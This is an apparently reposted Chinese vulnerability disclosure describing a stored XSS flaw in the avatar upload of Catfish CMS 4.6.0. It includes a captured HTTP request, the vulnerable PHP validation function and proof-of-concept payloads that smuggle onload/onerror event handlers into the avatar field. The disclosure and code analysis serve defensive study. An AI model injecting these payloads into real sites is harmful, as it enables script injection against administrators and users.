2. 程式人生 > 其它 >鯰魚CMS儲存XSS漏洞披露

鯰魚CMS儲存XSS漏洞披露

阿新 發佈:2022-04-28

概述

Catfish(鯰魚) CMS是一款開源的PHP內容管理系統。這個cms是十月我和學長小鬍子一起審計的。所以在這裡宣告下,洞是他找的,他不善言辭,授權給我來寫文章。漏洞已提交給廠商,同意公開此漏洞。

XSS漏洞點

這裡的版本是V4.6.0。出問題的地方是頭像上傳這個地方,這個cms以前爆過一枚任意檔案刪除漏洞也是這裡。

  1. 先註冊一個普通使用者
  2. 登入,上傳一張頭像。
  3. 上傳成功後開啟抓包,點選“頭像儲存”。

抓到資料如下

修改

POST /daimashenji/CatfishCMS-4.6.0/index.php/user/index/touxiang.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Referer: http://127.0.0.1/daimashenji/CatfishCMS-4.6.0/index.php/user/index/touxiang.html
Cookie: think_var=zh-cn; PHPSESSID=uo2u29h3sf9er6bj9f3d36rj80
Connection: close
Upgrade-Insecure-Requests: 1

avatar=http://127.0.0.1/daimashenji/CatfishCMS-4.6.0/data/uploads/20171109/022d804c4ea9af66c1a1f901d7c0b6a1.png" onload="alert(1)" a="1.jpg&fileselect%5B%5D=

回顯

管理員後臺瀏覽普通使用者管理

成功x到後臺!

相關程式碼跟進

CatfishCMS-4.6.0/application/admin/controller/Index.php頁面程式碼,96行

這個函式對傳入的avatar引數進行檢驗,繼續跟進

位於CatfishCMS-4.6.0/application/admin/controller/Common.php頁面,313行

 protected function isLegalPicture($picture)
    {
        if(stripos($picture,'>') === false)
        {
            $pathinfo = pathinfo($picture);
            if(isset($pathinfo['extension']))
            {
                if(in_array($pathinfo['extension'],['jpeg','jpg','png','gif']) && stripos($pathinfo['dirname'],'/data/') !== false)
                {
                    return true;
                }
            }
        }
        return false;
    }

三個限制:

  1. 引數不能含有 “>”
  2. 要以jpeg,jpg,png,gif 結尾
  3. 要含有 “/data/“ 路徑

觀察原來輸出點,是以雙引號進行閉合,觸發事件可以onload或者onerror或者其他,以.jpg結尾。所以我們payload為:

avatar=[http://127.0.0.1/daimashenji/CatfishCMS-4.6.0/data/uploads/20171109/test.png](http://127.0.0.1/daimashenji/CatfishCMS-4.6.0/data/uploads/20171109/test.png)" onerror="alert(2)" a="1.jpg

一點感悟

最近看到大佬們在微博說的幾句: 如果某個地方爆出了洞,就可以往這個地方深挖。因為最後講道理程式會出問題不僅僅是程式碼的問題,而是人的問題。

相關推薦

鯰魚CMS儲存XSS漏洞披露

概述 Catfish(鯰魚) CMS是一款開源的PHP內容管理系統。這個cms是十月我和學長小鬍子一起審計的。所以在這裡宣告下,洞是他找的,他不善言辭,授權給我來寫文章。漏洞已提交給廠商,同意公開此漏洞

XSS漏洞防禦之HttpOnly

  WWW服務依賴於Http協議實現,Http是無狀態的協議,所以為了在各個會話之間傳遞資訊,就需要使用Cookie來標記訪問者的狀態,以便伺服器端識別使用者資訊。

Gmail的三個XSS漏洞

起這個名字完全有標題黨的嫌疑,相信會有很多人慕名而來。其實這是看到老外的一篇部落格Cross- Site-Scripting in Google Mail有感而寫,關於Gmail的XSS,相信做這方面研究的人會有很多感觸。Gmail的成功是

xss漏洞

0x01 漏洞概述 我們如何登入管理員後臺: 1.我們找到後臺地址然後輸入賬號密碼

GoFrame 模板引擎對變數轉義輸出- XSS 漏洞

GoFrame 模板引擎對變數轉義輸出- XSS 漏洞 環境: gf v1.14.4 go 1.11 官網說明 預設情況下,模板引擎對所有的變數輸出並沒有使用HTML轉碼處理,也就是說,如果開發者處理不好,可能會存在XSS漏洞

XSS漏洞綜述

在本節中,我們將解釋什麼是XSS漏洞,描述不同型別的XSS漏洞,並詳細說明如何發現和防禦XSS漏洞

java修復xss漏洞

JAVA修復XSS漏洞方案一:對於請求中是封裝好的物件或者以屬性名作為引數的都適用以下解決方案:封裝好的物件,如:在這裡插入圖片描述使用屬性名作為引數,如:在這裡插入圖片描述以/updateRole和/addRole作為例子,

滲透測試:XSS漏洞定義及防護

什麼是XSSXSS(cross site script)或者說跨站指令碼是一種web應用程式的漏洞,惡意攻擊者往web頁面裡插入惡意script程式碼,當用戶瀏覽該頁之時,嵌入其中web裡面的script程式碼會被執行,從而達到惡意攻擊使用者的目

WEB安全-反射型XSS漏洞原理和實踐

XSS(跨站指令碼攻擊) 定義 瀏覽器將使用者輸入的內容,當做指令碼執行,執行了惡意的功能,這種針對使用者瀏覽器的攻擊即跨站指令碼攻擊。

工具類--HTML過濾器,用於去除XSS漏洞隱患。

package com.jyc.common.utils.html;import java.util.ArrayList;import java.util.Collections;import java.util.HashMap;import java.util.List;import java.util.Map;import java.util.concurrent.ConcurrentHas

任意儲存寫入漏洞+任意目的地址跳轉漏洞+gas耗盡拒絕服務漏洞

本文介紹了三類智慧合約安全漏洞:任意儲存寫入漏洞、任意目的地址跳轉漏洞、gas 耗盡拒絕服務漏洞並對他們進行分析

SpringBoot Xss漏洞修復

SpringBoot Xss漏洞修復 xss是什麼就不贅述了,你看到這裡肯定也知道了。SpringBoot修復Xss漏洞有兩種方案:

我們要在任何可能的地方測試XSS漏洞

在這篇文章中,我準備跟大家討論幾種不同的場景,在這些場景中,不同的服務都會收集各種各樣的資料,但它們又無法正確地去處理這些資料。在某些情況下,資料採用的是安全格式儲存和傳輸的,但是由於資料的解析操作以

Web安全學習筆記 XSS漏洞分析下

Web安全學習筆記 XSS下 玲瓏骰子安紅豆,入骨相思知不知。 ——溫庭筠《新添聲楊柳枝詞》

【實戰】儲存XSS+CSRF(XSS繞過到蠕蟲攻擊)

0x00 儲存XSS 1) 可繞過的XSS 給大家分享個漏洞案例,今天上午剛把電腦修好某技術學院儲存XSS+CSRF(XSS繞過濾到蠕蟲攻擊)註冊處:

Log4Shell 漏洞披露已近一年,它對我們還有影響嗎?

在 Log4Shell 高危漏洞事件披露幾乎整整一年之後,新的資料顯示,對全球大多陣列織來說,補救工作是一個漫長、緩慢、痛苦的過程。 

bolt cms V3.7.0 xss和遠端程式碼執行漏洞

本文首發於“合天智匯”公眾號 作者:ordar123 宣告:筆者初衷用於分享與普及網路知識,若讀者因此作出任何危害網路安全行為後果自負,與合天智匯及原作者無關!

Catfish(鯰魚) Blog V1.3.15儲存xss

Catfish(鯰魚) Blog前臺文章評論處存在 儲存xss漏洞。在 application\\index\\controller\\index.php 檔案第 692行

程式碼審計學習—zzcms儲存xss

程式碼審計學習—zzcms儲存xss 版本:zzcms 201910 本地搭建網站 漏洞位置: 網站/inc/function.php

web安全之跨站指令碼漏洞XSS

XSS(跨站指令碼)概述以及pikachu上的實驗操作 Cross-Site Scripting 簡稱為“CSS”,為避免與前端疊成樣式表的縮寫\"CSS\"衝突,故又稱XSS